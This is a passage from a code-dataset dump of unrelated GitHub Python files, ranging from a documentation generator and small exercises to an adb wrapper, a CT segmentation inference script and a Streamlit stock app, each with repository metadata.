miss_in_path)\n\n add_to_write_msg(write_msg, currentmodule, keep_in_all)\n\n for dir_each in dirs_keep:\n path_each = os.path.join(path, dir_each)\n write_msg, write_api = search_dir_files(\n path_each, title_pro + 1, miss_dir, write_msg, write_api\n )\n\n return write_msg, write_api\n\n\ndef api_generator(\n cap_dir, target_dir, module_name, docstring=None, ignore=None\n):\n title_pro = 0\n write_msg = []\n write_api = []\n api_title = \"API Reference\\n\"\n write_api.append(api_title)\n write_api.append(\"\".join(title_list[1] * len(api_title)) + \"\\n\")\n write_api.append(\"\\n\")\n\n miss_key = []\n if ignore is not None:\n miss_key = ignore\n\n title = \"cap.\" + module_name\n write_msg.append(title + \"\\n\")\n title_msg = title_list[title_pro]\n write_msg.append(\"\".join(title_msg * len(title)) + \"\\n\")\n write_msg.append(\"\\n\")\n\n if docstring is not None:\n write_msg.append(docstring)\n write_msg.append(\"\\n\")\n write_msg.append(\"\\n\")\n\n title_pro += 1\n module_path = os.path.join(cap_dir, module_name)\n write_msg, write_api = search_dir_files(\n module_path, title_pro, miss_key, write_msg, write_api, first_flag=True\n )\n\n write_msg = write_msg + write_api\n output_file_name = os.path.join(target_dir, module_name + \".rst\")\n\n with open(output_file_name, \"w\") as f:\n for line in write_msg:\n f.write(line)\n cprint(f\"[docs] create {output_file_name}\", \"green\")\n\n\ndef main(args):\n file_list = edict(\n 
yaml.load(open(args.api_module_list, \"r\"), Loader=yaml.SafeLoader)\n )\n\n if not os.path.exists(args.target_dir):\n os.mkdir(args.target_dir)\n\n for module_name, module_keys in file_list.items():\n docstring = None\n ignore = None\n if \"docstring\" in module_keys:\n docstring = module_keys[\"docstring\"][0]\n if \"ignore\" in module_keys:\n ignore = module_keys[\"ignore\"]\n\n cap_dir = os.path.join(args.root, \"cap\")\n api_generator(cap_dir, args.target_dir, module_name, docstring, ignore)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--api-module-list\",\n type=str,\n required=True,\n help=\"The api module and docstring file.\",\n )\n parser.add_argument(\n \"--root\", type=str, default=\"../../\", help=\"The root dir of CAP.\"\n )\n parser.add_argument(\n \"--target-dir\", type=str, default=\"../../docs/source/api_reference\"\n )\n args = parser.parse_args()\n main(args)\n","repo_name":"xingyun-xy/cap","sub_path":"tools/api_generator/api_generator.py","file_name":"api_generator.py","file_ext":"py","file_size_in_byte":6079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42354575872","text":"def pedir_num():\n num = int(input(\"Introduce un numero: \"))\n while num <= 0:\n print(\"El numero no puede ser negativo o 0\")\n num = int(input(\"Introduce un numero positivo mayor que 0\"))\n return num\n\n\ndef cadena_impar(num):\n cadena = \"\"\n num = int(num)\n for i in range(1, num + 1, 2):\n if i == num or i == num - 1:\n cadena += str(i) + \".\"\n else:\n cadena += str(i) + \" - \"\n return cadena\n\n\ndef main():\n numero = pedir_num()\n print(cadena_impar(numero))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"IES-Rafael-Alberti/1dam-ejercicios-u2-jfertri853","sub_path":"src/P2_2_EjerciciosIterativos/Ejercicio2_3.py","file_name":"Ejercicio2_3.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17299106179","text":"import sys\r\nimport os\r\nimport numpy as np\r\nimport logging as l\r\nimport datetime\r\n\r\n\r\ndef CreateOutputFile(partial_name, own_directory = False, date = True, overwrite = False):\r\n '''\r\n Create and open a file containing the header described below.\r\n\r\n Parameters:\r\n ----------\r\n partial_name: partial name of the file and the directory that will contain the file.\r\n own_directory: boolean. Default: False.\r\n If true, a new directory './output/_{partial_name}/aaaa-mm-gg_hh.mm.ss' will be created.\r\n If flase, the path of the file will be './output/_{partial_name}'.\r\n date: boolean. Default: True.\r\n If true, the file name will include datetime.\r\n If false, it will not.\r\n \r\n\r\n Output\r\n ------\r\n f: file (open). 
Each record contains the following fields, separated by commas (csv file):\r\n - dilca: variant of Dilca, one of {\"M\", \"RR\"}\r\n - dp_method: differentially private variant of dilca, one of {'su', 'cm'}\r\n - eps: overall epsilon\r\n - sigma: sigma parameter for dilca_M\r\n - h: portion of eps to be used for context computation (only for dp_method == 'su')\r\n - i: index of the target variable\r\n - n_values: number of distinct values of variable i\r\n - pearson: pearson similarity of the distance matrices\r\n - l1_dist: l1 norm distance of the distance matrices\r\n - context: context of variable i\r\n - context_dp: differentially private context of variable i\r\n - jaccard: jaccard similarity index between context and context_dp\r\n - overlap: overlap score between context and context_dp\r\n - date: date of the test\r\n \r\n File name:{partial_name}_aaaa-mm-gg_hh.mm.ss.csv or {partial_name}_results.csv\r\n dt: datetime (as in the directory/ file name)\r\n\r\n \r\n '''\r\n\r\n \r\n dt = f\"{datetime.datetime.now()}\"\r\n if own_directory:\r\n data_path = f\"./output/_{partial_name}/\" + dt[:10] + \"_\" + dt[11:13] + \".\" + dt[14:16] + \".\" + dt[17:19] + \"/\"\r\n else:\r\n data_path = f\"./output/_{partial_name}/\"\r\n directory = os.path.dirname(data_path)\r\n if not os.path.exists(directory):\r\n os.makedirs(directory)\r\n\r\n new = True\r\n if date:\r\n file_name = partial_name + \"_\" + dt[:10] + \"_\" + dt[11:13] + \".\" + dt[14:16] + \".\" + dt[17:19] + \".csv\"\r\n else:\r\n file_name = partial_name + '_results.csv'\r\n if os.path.isfile(data_path + file_name):\r\n if overwrite:\r\n os.remove(data_path + file_name)\r\n else:\r\n new = False\r\n \r\n \r\n f = open(data_path + file_name, \"a\",1)\r\n if new:\r\n f.write(\"dilca, dp_method, eps, sigma, h, i, n_values, pearson, l1_dist, context, context_dp, jaccard, overlap, date\\n\")\r\n\r\n return f, dt\r\n\r\n\r\n\r\ndef CreateLogger(input_level = 'INFO'):\r\n level = {'DEBUG':l.DEBUG, 'INFO':l.INFO, 'WARNING':l.WARNING, 'ERROR':l.ERROR, 'CRITICAL':l.CRITICAL}\r\n logger = l.getLogger()\r\n logger.setLevel(level[input_level])\r\n","repo_name":"elenabattaglia/dpdilca","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14805209871","text":"import os\r\n\r\nimport matplotlib.cm as cm\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom enphaseAI.utils.constants import FIGURE_DIR\r\n\r\n\r\ndef basic_plot(\r\n name: str,\r\n data: np.ndarray,\r\n labels: np.ndarray,\r\n xlabel: str = \"x\",\r\n ylabel: str = \"y\"\r\n) -> None:\r\n\r\n plt.style.use(\"ggplot\")\r\n fig, ax = plt.subplots()\r\n\r\n clusters = set(labels)\r\n num_ele = data.shape[0]\r\n num_clusters = len(clusters)\r\n\r\n ax.set_xlabel(xlabel, fontsize=15)\r\n ax.set_ylabel(ylabel, fontsize=15)\r\n ax.tick_params(labelsize=15)\r\n\r\n colors = [cm.Set1(lab + 1) for lab in labels]\r\n for i in range(num_clusters):\r\n cluster = list(clusters)[i]\r\n x = data[labels == cluster, 0]\r\n y = data[labels == cluster, 1]\r\n scatter = ax.scatter(x, y, color=np.array(colors)[labels == cluster], label=str(int(cluster)))\r\n\r\n plt.tight_layout()\r\n plt.legend()\r\n plt.savefig(os.path.join(FIGURE_DIR, name))\r\n 
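# save before show(): with some Matplotlib backends the figure is cleared\r\n    # once the window closes, and a later savefig() could write a blank image\r\n    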
plt.show()\r\n","repo_name":"jimleroux/enphaseai","sub_path":"enphaseAI/utils/matplotlib_plotter.py","file_name":"matplotlib_plotter.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35624478320","text":"import mpi4py\nmpi4py.rc.recv_mprobe = False\nfrom mpi4py import MPI\nimport numpy as np\nfrom sys import argv\nimport os\n\n\nif __name__ == '__main__':\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n\n if rank == 0:\n # Print all given arguments.\n print(f\"DATASET\\n=======\\nName: {argv[1]}\")\n print(\"Contains:\")\n for file in os.listdir(f\"{argv[3]}/{argv[1]}\"):\n if file.endswith(\".v\") or file.endswith(\".e\"):\n print(f\"\\t{file}\")\n\n print(\"\\nPATHS\\n=====\")\n print(f\"Playground: {argv[2]}\")\n print(f\"Data: {argv[3]}/{argv[1]}\")\n print(f\"Results: {argv[4]}\\n\\n\")\n\n # Set data for further testing.\n numData = 8\n data = np.linspace(0.0, 3.14, numData)\n else:\n numData = None\n\n numData = comm.bcast(numData, root=0)\n\n if rank != 0:\n data = np.empty(numData, dtype='d')\n\n comm.Bcast(data, root=0)\n\n print(f\"Rank: {rank}, numData: {numData}, Processorname: \" +\n f\"{MPI.Get_processor_name()}\")\n","repo_name":"OkkeVanEck/distributed_systems_lab","sub_path":"code/simulations/setup_test.py","file_name":"setup_test.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42556102599","text":"import os\nimport types\n\nfrom adb import adb_commands\nfrom adb import sign_pythonrsa\nfrom adb.adb_protocol import InvalidResponseError, InvalidCommandError\n\nfrom .base_adb import AdbInterface, AdbProxy\nfrom .log import default as logging\n\n\nclass ReadConnectError(Exception):\n pass\n\n\nclass PyAdb(AdbInterface):\n \"\"\"python-adb的封装\"\"\"\n\n @classmethod\n def get_proxy(cls, serial=None) -> AdbProxy:\n return AdbProxy(cls(serial))\n\n @staticmethod\n def my_load_rsa_key_path(file_path):\n # 原来的加载方法,在python3中问题兼容性问题\n with open(file_path + '.pub', 'rb') as f:\n pub = f.read()\n with open(file_path, 'rb') as f:\n pri = f.read()\n return sign_pythonrsa.PythonRSASigner(pub, pri)\n\n @classmethod\n def connect_dev(cls, adb_key_path, serial=None) -> adb_commands.AdbCommands:\n \"\"\"\n 连接设备,可指定连接的具体设备名\n :param adb_key_path: 与设备通讯的授权密钥\n :param serial: 可选,设备号 (可通过adb devices查看),不提供则连接第一个\n :return:\n \"\"\"\n dev = adb_commands.AdbCommands()\n try:\n dev.ConnectDevice(rsa_keys=[cls.my_load_rsa_key_path(os.path.expanduser(adb_key_path))], serial=serial)\n except InvalidCommandError as e:\n dev.Close()\n logging.warning(f'reconnect on error: {e}')\n return cls.connect_dev(adb_key_path, serial=serial)\n return dev\n\n def __init__(self, serial=None, adb_key_path='~/.android/adbkey', auto_connect=True):\n try:\n os.system('adb kill-server')\n except:\n pass\n self.serial = serial\n self.adb_key_path = adb_key_path\n self._adb = None\n if auto_connect:\n self.open_connect()\n\n @property\n def adb(self):\n if not self._adb:\n raise ValueError('Please connect device first!')\n return self._adb\n\n def get_device_serial(self) -> str:\n return self.serial\n\n def open_connect(self) -> adb_commands.AdbCommands:\n self._adb = self.connect_dev(self.adb_key_path, serial=self.serial)\n return self._adb\n\n def _on_read_error(self, e, cmd, clean_wrap, reconnect_on_err):\n if reconnect_on_err:\n logging.warning('trying to reconnect adb!')\n self.adb.Close()\n 
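# reopen the USB session and transparently retry the same command;\n            # run_shell() recurses through here until the read succeeds\n            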
self.open_connect()\n return self.run_shell(cmd, clean_wrap, reconnect_on_err)\n else:\n raise ReadConnectError(e)\n\n def run_shell(self, cmd: str, clean_wrap=False, reconnect_on_err=True) -> str:\n \"\"\"\n 执行命令\n :param cmd: 命令内容\n :param clean_wrap: 是否清理结果换行\n :param reconnect_on_err: 命令执行过程中出现IO读写的错误时重新连接. 如果为False,则发生错误时将报错 ReadConnectError\n :return:\n \"\"\"\n logging.debug(f'adb shell {cmd}')\n try:\n rs = self.adb.Shell(cmd)\n if clean_wrap:\n rs = rs.strip()\n return rs\n except InvalidResponseError as e:\n return self._on_read_error(e, cmd, clean_wrap, reconnect_on_err)\n except InvalidCommandError as e:\n return self._on_read_error(e, cmd, clean_wrap, reconnect_on_err)\n except AttributeError as e:\n return self._on_read_error(e, cmd, clean_wrap, reconnect_on_err)\n\n def stream_shell(self, cmd: str) -> types.GeneratorType:\n \"\"\"\n 执行命令,返回输出流的迭代器,每次返回一行输出结果\n :param cmd: 命令内容\n :return: 每行输出结果迭代\n \"\"\"\n logging.debug(f'adb shell(Streaming) {cmd}')\n return self.adb.StreamingShell(cmd)\n\n def install_app(self, apk_path):\n return self.adb.Install(apk_path, grant_permissions=True, timeout_ms=1200000)\n\n def uninstall_app(self, app_bundle: str):\n return self.adb.Uninstall(app_bundle)\n\n def close(self):\n try:\n self.adb.Close()\n except:\n pass\n\n def push_file(self, local_path: str, device_path: str):\n return self.adb.Push(local_path, device_path)\n\n def pull_file(self, device_path: str, local_path: str):\n return self.adb.Pull(device_path, local_path)\n\n def devices(self):\n # 这里有坑,已经连接了设备的话,执行Devices 方法会报错,必须先断开连接\n logging.warning('listing devices need to disconnect current device!')\n self.close()\n return [(x.serial_number, '') for x in self._devices()]\n\n @staticmethod\n def _devices():\n # 请在连接设备前调用,否则会报错 # usb1.USBErrorAccess: LIBUSB_ERROR_ACCESS [-3]\n return adb_commands.AdbCommands.Devices()\n","repo_name":"nic562/AndroidPerf","sub_path":"android_perf/py_adb.py","file_name":"py_adb.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12256666167","text":"#!/usr/bin/env python3\n\nimport os\nimport copy\nimport torch\nimport os.path\nimport argparse\nimport numpy as np\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torchvision import models\nimport torch.utils.data as Data\n\n\ndef encoder(model):\n models = {'vgg': VGG,\n 'resnet': ResNet,\n 'mobilenet': MobileNetV2}\n Model = models[model]\n return Model()\n\n\nclass AutoEncoder(nn.Module):\n def __init__(self, model='vgg'):\n super().__init__()\n self.encoder = encoder(model)\n self.decoder = Decoder()\n\n def forward(self, x):\n coding = self.encoder(x)\n output = self.decoder(coding)\n return output\n\n\nclass VGG(models.VGG):\n def __init__(self, pretrained=True, requires_grad=True, remove_fc=True, show_params=False):\n super().__init__(models.vgg16().features)\n\n if pretrained:\n self.load_state_dict(models.vgg16(pretrained=True).state_dict())\n\n if not requires_grad:\n for param in super().parameters():\n param.requires_grad = False\n\n if remove_fc:\n del self.classifier\n\n if show_params:\n for name, param in self.named_parameters():\n print(name, param.size())\n\n def forward(self, x):\n x = self.features(x)\n return x\n\n\nclass ResNet(models.ResNet):\n def __init__(self, pretrained=True, requires_grad=True, remove_fc=True, show_params=False):\n super().__init__(block=models.resnet.BasicBlock, layers=[2, 2, 2, 2])\n\n if pretrained:\n 
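# pull in torchvision's ImageNet-pretrained resnet18 weights; the state\n            # dict matches because this subclass keeps the stock layer layout\n            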
self.load_state_dict(models.resnet18(pretrained=True).state_dict())\n\n if not requires_grad:\n for param in super().parameters():\n param.requires_grad = False\n\n if remove_fc:\n del self.fc\n\n if show_params:\n for name, param in self.named_parameters():\n print(name, param.size())\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n return x\n\n\nclass MobileNetV2(models.MobileNetV2):\n def __init__(self, pretrained=True, requires_grad=True, remove_fc=True, show_params=False):\n super().__init__()\n\n if pretrained:\n self.load_state_dict(models.mobilenet_v2(pretrained=True).state_dict())\n\n if not requires_grad:\n for param in super().parameters():\n param.requires_grad = False\n\n if remove_fc:\n del self.classifier\n\n if show_params:\n for name, param in self.named_parameters():\n print(name, param.size())\n\n def forward(self, x):\n return self.features(x)\n\n\nclass Decoder(nn.Module):\n def __init__(self, in_channels=512): # Use 1280 for MobileNetV2\n super().__init__()\n self.relu = nn.ReLU(inplace=True)\n self.deconv1 = nn.ConvTranspose2d(in_channels, 512, kernel_size=3, stride=2, padding=1, dilation=1, output_padding=1)\n self.bn1 = nn.BatchNorm2d(512)\n self.deconv2 = nn.ConvTranspose2d(512, 256, kernel_size=3, stride=2, padding=1, dilation=1, output_padding=1)\n self.bn2 = nn.BatchNorm2d(256)\n self.deconv3 = nn.ConvTranspose2d(256, 128, kernel_size=3, stride=2, padding=1, dilation=1, output_padding=1)\n self.bn3 = nn.BatchNorm2d(128)\n self.deconv4 = nn.ConvTranspose2d(128, 64, kernel_size=3, stride=2, padding=1, dilation=1, output_padding=1)\n self.bn4 = nn.BatchNorm2d(64)\n self.deconv5 = nn.ConvTranspose2d(64, 32, kernel_size=3, stride=2, padding=1, dilation=1, output_padding=1)\n self.bn5 = nn.BatchNorm2d(32)\n self.classifier = nn.Conv2d(32, 3, kernel_size=1)\n\n def forward(self, x):\n x = self.bn1(self.relu(self.deconv1(x))) # size=(N, 512, x.H/16, x.W/16)\n x = self.bn2(self.relu(self.deconv2(x))) # size=(N, 256, x.H/8, x.W/8)\n x = self.bn3(self.relu(self.deconv3(x))) # size=(N, 128, x.H/4, x.W/4)\n x = self.bn4(self.relu(self.deconv4(x))) # size=(N, 64, x.H/2, x.W/2)\n x = self.bn5(self.relu(self.deconv5(x))) # size=(N, 32, x.H, x.W)\n x = self.classifier(x) # size=(N, n_class, x.H/1, x.W/1)\n return x # size=(N, n_class, x.H/1, x.W/1)\n\n\nif __name__ == \"__main__\":\n from dataset import SubTF\n from torchutil import show_batch\n import torchvision.transforms as transforms\n\n transform = transforms.Compose([\n transforms.CenterCrop(tuple([320, 320])),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n data = SubTF(root='/data/datasets', train=True, transform=transform)\n loader = Data.DataLoader(dataset=data, batch_size=1, shuffle=True)\n\n net, best_loss = torch.load('saves/resnet.pt')\n\n with torch.no_grad():\n for batch_idx, inputs in enumerate(loader):\n if torch.cuda.is_available():\n inputs = inputs.cuda()\n outputs = net(inputs)\n show_batch(torch.cat([inputs, outputs], dim=0), name='test', waitkey=1000)\n","repo_name":"sair-lab/interestingness","sub_path":"autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":5270,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"53"} +{"seq_id":"39146296259","text":"import random\n\n\ndef jogar():\n asterisco = 
\"******************************************\"\n bem_vindo = \" Bem vindo ao jogo da Forca \"\n\n print(asterisco)\n print(bem_vindo)\n print(asterisco)\n\n secreta = {\"banana\", \"pera\", \"abacate\", \"limao\", \"açai\", \"morango\", \"manga\", \"laranja\"}\n palavra_secreta = random.choice(list(secreta))\n tentativa = len(palavra_secreta)\n palavra = \"\"\n\n enforcou = False\n acertou = False\n frase = \"\"\n tentativa = 1\n fim_jogo = \"FIM DE JOGO\"\n total = 1\n\n print(\"A palavra tem {} caractere {}\".format(len(palavra_secreta), str(contadorSegredor(palavra_secreta))))\n print(\"\\nVocê tem {} TENTATIVAS\".format(6))\n\n # Enquanto não enforcou e não acertou\n while not enforcou and not acertou:\n print(\"\")\n print(asterisco)\n chute = input(str(\"Digite uma letra: \\n\"))\n chute = chute.lower()\n contador = 0\n if palavra_secreta.__contains__(chute):\n for letra in palavra_secreta:\n if len(palavra) == len(palavra_secreta):\n if palavra.__contains__(letra):\n print(letra.upper(), end=\"\")\n frase = frase + letra\n contador += len(letra)\n elif palavra_secreta[contador].__contains__(chute):\n print(letra.upper(), end=\"\")\n frase = frase + letra\n contador += len(letra)\n elif palavra[contador] == letra:\n frase = frase + letra\n print(letra.upper(), end=\"\")\n else:\n print(\"_\", end=\"\")\n frase = frase + \"_\"\n contador += len(letra)\n if len(palavra) < len(palavra_secreta):\n if chute == letra:\n if len(palavra) != len(palavra_secreta):\n print(letra.upper(), end=\"\")\n frase = frase + letra\n palavra = palavra + chute\n contador += len(letra)\n else:\n print(\"_\", end=\"\")\n palavra = palavra + \"_\"\n frase = frase + \"_\"\n contador += len(letra)\n palavra = frase\n frase = \"\"\n print(\"\\nVocê tem {} TENTATIVAS\".format(total))\n print(\"Número de ERROS Nº:{}\".format(tentativa - 1))\n else:\n total = str(6 - tentativa)\n print(\"\\nVocê tem {} TENTATIVAS\".format(total))\n tentativa = tentativa + 1\n print(\"Número de ERROS Nº:{}\".format(tentativa - 1))\n while tentativa == 7:\n print(palavra)\n enforcou = True\n acertou = True\n break\n\n if palavra == palavra_secreta:\n acertou = True\n print(asterisco)\n print(\"\\nPARABÉNS!!!!! \\nVOCÊ GANHOU!!!!!! 
\\n\")\n    print(asterisco)\n\n    print(\"Palavra SECRETA era: {}\".format(palavra_secreta).upper())\n    print(fim_jogo)\n    print(asterisco)\n\n\ndef contadorSegredor(palavra: str):\n    tamanho = \"\"\n    for contador in palavra:\n        tamanho = tamanho + \"_\"\n\n    return tamanho\n\n\n# Start of the application\nif (__name__ == \"__main__\"):\n    jogar()\n","repo_name":"marciliodevjava/curso-python","sub_path":"Curso-de-python-comecando-com-a-linguagem/jogo/forca.py","file_name":"forca.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14985881030","text":"# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\nclass Solution:\n    def lowestCommonAncestor(self, r: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n        mi=min(p.val,q.val)\n        ma=max(p.val,q.val)\n        while r!=None:\n            if(mi<r.val and ma<r.val):\n                r=r.left\n            elif(mi>r.val and ma>r.val):\n                r=r.right\n            else:\n                break\n        return r","repo_name":"Anushree1291/Leetcode-solutions","sub_path":"0235-lowest-common-ancestor-of-a-binary-search-tree/0235-lowest-common-ancestor-of-a-binary-search-tree.py","file_name":"0235-lowest-common-ancestor-of-a-binary-search-tree.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74907279209","text":"import setuptools\n\nwith open('README.md', 'r', encoding='utf-8') as fh:\n    long_description = fh.read()\n\ntests_require = [\n    'pytest'\n]\n\nsetuptools.setup(\n    name='pyedi',\n    version='1.0.0',\n    author='Anton Samuelsson',\n    author_email='samuelsson.anton@gmail.com',\n    description='A lightweight EDI file parser',\n    long_description=long_description,\n    long_description_content_type='text/markdown',\n    url='https://github.com/freestream/pyedi',\n    classifiers=[\n        'Programming Language :: Python :: 3.9',\n        'License :: OSI Approved :: MIT License',\n        'Operating System :: OS Independent',\n    ],\n    tests_require=tests_require,\n    packages=setuptools.find_packages(),\n    python_requires='>=3.9',\n)\n","repo_name":"freestream/pyedi","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"970496790","text":"import os, sys\nimport numpy as np\nimport tensorflow as tf\nimport SimpleITK as sitk\nfrom skimage.transform import resize\n\nimport calculon.utils.log as log\nfrom calculon.utils.validoptions import ValidOption\nfrom calculon.utils.image_utils import create_mask, standardize_volume, read_nifti_file, read_dicom_series\nfrom calculon.models.model_utils import dice_coef, dice_coef_loss\n\nclass Inference:\n    ''' Class for the inference of segmenting lung CTs\n\n\n    '''\n    default_options = {\n        'path_to_data':\n            ValidOption(\n                type=str,\n                default='./',\n                help='Path to data to be tested.'),\n        'path_to_savedmodel':\n            ValidOption(\n                type=str,\n                default='./',\n                help='Path to pretrained tensorflow model.'),\n        'image_shape_resize':\n            ValidOption(\n                type=list,\n                subtype=int,\n                default=[128, 128, 128],\n                help='Resize image to this height when training'),\n        'num_classes':\n            ValidOption(\n                type=int,\n                default=2,\n                help='Number of classes to predict into')\n    }\n\n    @classmethod\n    def from_options(cls, options):\n        ''' Create tester from options dictionary\n\n        Args:\n            options (dict): Dictionary with all necessary options\n\n        Returns:\n            Tester: Tester object\n\n        '''\n\n        
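# output_dir sits at the top level; the remaining keys live under the\n        # nested 'inference' section and mirror default_options above\n        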
output_dir = options['output_dir']\n path_to_data = options['inference']['path_to_data']\n path_to_savedmodel = options['inference']['path_to_savedmodel']\n image_shape_resize = options['inference']['image_shape_resize']\n num_classes = options['inference']['num_classes']\n return cls(output_dir, path_to_data, path_to_savedmodel, \n image_shape_resize, num_classes)\n\n def __init__(self, output_dir, path_to_data, path_to_savedmodel, \n image_shape_resize, num_classes):\n '''Initialize the segmentation.\n \n Args:\n output_dir (str): Path to output directory.\n path_to_data (str): Path to lung CT image to be segmented.\n path_to_savedmodel (str): Path to saved model directory.\n image_shape_resize (array): Shape of image to be resized when segmenting.\n num_classes (int): Number of classes to segment into. Binary segmentation: num_classes=2.\n '''\n\n self.output_dir = output_dir\n self.path_to_data = path_to_data\n self.path_to_savedmodel = path_to_savedmodel\n self.image_shape_resize = image_shape_resize\n self.num_classes = num_classes\n \n def _preprocess(self, image):\n '''Preprocess an image to be segmented.\n \n Args:\n image (array): Image array to be preprocessed.\n \n Returns:\n array: Preprocessed image\n '''\n # Resize to new shape\n image = resize(image, self.image_shape_resize, mode='constant', order=1, preserve_range=True, anti_aliasing=False) # bi-linear\n \n # Clip values to -1024 HU and 600 HU\n image = np.clip(image, a_min=-1024, a_max=600)\n\n # Standardize data with mean = 0 and std. = 1\n image = standardize_volume(image)\n\n # Expand dims\n image = tf.expand_dims(image, axis=0, name=None)\n image = tf.expand_dims(image, axis=-1, name=None)\n return image\n\n def _load_model(self):\n '''Recreates the same tf.model\n \n Returns:\n tf.model: A compiled tf.model\n '''\n model = tf.keras.models.load_model(self.path_to_savedmodel, custom_objects = { 'dice_coef_loss': dice_coef_loss, 'dice_coef': dice_coef },compile=False)\n model.compile( loss = dice_coef_loss, optimizer = tf.keras.optimizers.Adam())\n return model\n \n def predict(self, image, model):\n '''Takes an image and a model and predicts the segmentation mask.\n \n Args:\n image (array): Image to be predicted on.\n model (tf.model): Tensorflow model to be predicted on.\n \n Returns:\n array: Mask array.\n '''\n # Get the original shape\n orig_shape = image.shape\n \n # Preprocess\n image = self._preprocess(image)\n\n # Predict\n pred_mask = model.predict(image)\n\n # Argmax over the classes and remove last dim\n mask = create_mask(pred_mask)\n mask = tf.squeeze(mask, axis=-1)\n\n # Transform to numpy array\n mask = tf.make_tensor_proto(mask)\n mask = tf.make_ndarray(mask)\n\n # Resize to original shape\n mask = resize(mask, output_shape=orig_shape, mode='constant', order=0, preserve_range=True, anti_aliasing=False) # order = 0: nearest neighbor\n return mask\n \n def _create_output_filename(self):\n '''Creates a output mask filename based on the CT basename, e.g. 
pat01_mask.nii.gz\n '''\n basename = os.path.basename(self.path_to_data)\n basename = os.path.splitext(basename)[0]\n outputfilename = os.path.join(self.output_dir, basename + '_mask.nii.gz')\n return outputfilename\n\n def write_image(self, image):\n '''Writes an image with SITK.\n \n Args:\n image (array): Image array.\n '''\n outputImageFileName = self._create_output_filename()\n sitk_image = sitk.GetImageFromArray(image)\n sitk.WriteImage(sitk_image, outputImageFileName)\n print('Segmentation written to:', outputImageFileName)\n\n def execute(self):\n '''Execute the inference process.\n '''\n model = self._load_model()\n image = read_nifti_file(self.path_to_data)\n mask = self.predict(image, model)\n self.write_image(mask)","repo_name":"jbi35/seg_training","sub_path":"inference/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":5891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18251688983","text":"'''\nTitle : 세 수 고르기\nLevel : S3\nProblem : M개의 자연수로 이루어진 집합 S와 자연수 N\n S에 속하지 않는 자연수 x,y,z를 골라 |N-xyz|의 최솟값을 구한다.\nType : 완전탐색\nIdea : 1. N의 최대범위는 1000이므로 확인할 x,y,z의 범위는 1001까지 하면된다.\n 1-1. x,y,z는 1000을 넘겨도 상관없으나, 1001 이상으로 확인할 필요는 없다.\n 1-2. x*y*1002 이상 될 경우 그 값보다 |N-xyz|이 작을 경우가 없다.\n'''\nimport math\n\nN, M = map(int, input().split())\nS = list(map(int, input().split()))\ne = [False] * 1002#안 되는 수 : 1 ~ 1000\nfor s in S:\n e[s] = True\n\nans = math.inf\nfor x in range(1, 1001):\n if e[x] is True:\n continue\n for y in range(x, 1001):\n if e[y] is True:\n continue\n for z in range(y, 1002):\n if e[z] is True:\n continue\n ans = min(ans, abs(N-x*y*z))\nprint(ans)\n","repo_name":"Just-NB/Algorithm","sub_path":"Baekjoon/2021/Nov/25/1503.py","file_name":"1503.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74742873766","text":"import streamlit as st\nimport pandas as pd\nimport yfinance as yf\nfrom datetime import date, timedelta\n\nst.title('Trend Analysis Web App')\n\nticker_input = st.text_input(\"Enter Tickers (i.e.: GS, MSFT, AAPL)\", 'GS, MSFT, AAPL')\n\nperiod = st.text_input(\"Enter Period (valid periods: 1d,5d,1mo,3mo,6mo,1y,2y,5y,10y,ytd,max)\", '1d')\n\n# st.write(f\"ticker inputs: {ticker_input}\")\n# st.write(f\"period to extract: {period}\")\n\n@st.cache\ndef get_ticker_data(tickers = None, period = None):\n assert tickers is not None\n assert period is not None\n\n tickers = [t.strip() for t in tickers.split(',')]\n tickers_df = yf.download(tickers=tickers, period=period)\n tickers_df = tickers_df.stack().reset_index().rename(columns={'level_1':'Ticker'})\n\n return tickers_df\n\ndf = get_ticker_data(tickers = ticker_input, period = period)\n\nst.write(df)\n\n@st.cache\ndef convert_df(df):\n # IMPORTANT: Cache the conversion to prevent computation on every rerun\n return df.to_csv().encode('utf-8')\n\n\ncsv = convert_df(df)\n\nst.download_button(\n label=\"Download data as CSV\",\n 